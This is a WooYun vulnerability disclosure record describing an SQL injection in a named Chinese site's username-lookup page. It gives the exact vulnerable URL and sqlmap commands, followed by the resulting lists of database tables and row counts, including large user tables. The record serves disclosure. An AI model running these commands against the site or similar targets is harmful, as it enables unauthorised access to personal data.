乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-23: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-05-07: 厂商已经主动忽略漏洞,细节向公众公开
网界网分站SQL注射(十几万用户数据)
注入点:
http://passport.cnw.com.cn/findusername.php?username=crtest1
其中,username参数存在SQL注射漏洞。
sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --dbs --current-user --current-db
sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --count
+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| userauditlogs | 264429 || users | 128142 || users2 | 127382 || laiyuan | 30618 || bjjt_login | 20666 || xdd_answer | 19526 || bjjt_dc | 14017 || sg_qdetial | 13698 || rel_usermail | 9077 || rel_usermail_20131206 | 8858 || sg_role | 4055 || t4 | 2862 || bjjt_reg | 1643 || urlvisitrecords | 1332 || intel121112 | 819 || bjjt1 | 649 || t3 | 275 || t1 | 184 || unsub_fb | 162 || sg1 | 138 || informatica | 101 || rel_othermail | 54 || sg_que | 45 || wy_industry | 35 || wy_duty | 20 || sg_roleitem | 18 || bjjtcourse | 15 || murlinfos | 12 || mailtypes | 10 || wy_companysize | 7 || wy_Turnover | 7 || sg_final_fight | 6 || wy_Pcsize | 6 || wy_serversize | 6 || bjjtcoursecate | 2 || bjjtadmin | 1 || sg_num | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 959 || COLLATION_CHARACTER_SET_APPLICABILITY | 126 || COLLATIONS | 126 || TABLES | 76 || STATISTICS | 69 || KEY_COLUMN_USAGE | 54 || TABLE_CONSTRAINTS | 54 || CHARACTER_SETS | 36 || SCHEMA_PRIVILEGES | 30 || SCHEMATA | 4 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+Database: ccw_passport+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| users | 19 |+---------------------------------------+---------+Database: cnwprojects+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| answer2 | 9665739 || answer | 32107 || users | 3573 || 20090609_cisco | 2055 || 20090605_ibm | 867 || news_content | 461 || 20090424_juniper | 447 || 20090311_symantec_records | 403 || 20090608_arrayamp | 235 || 20090309_symantec | 97 || question | 97 || newsletter | 26 || 20090506_novell | 15 || manswer | 13 || project | 12 || fuzeren | 8 || mquestion | 6 || meeting | 5 || musers | 2 |+---------------------------------------+---------+
安全测试,绝未脱裤 :)
未能联系到厂商或者厂商积极拒绝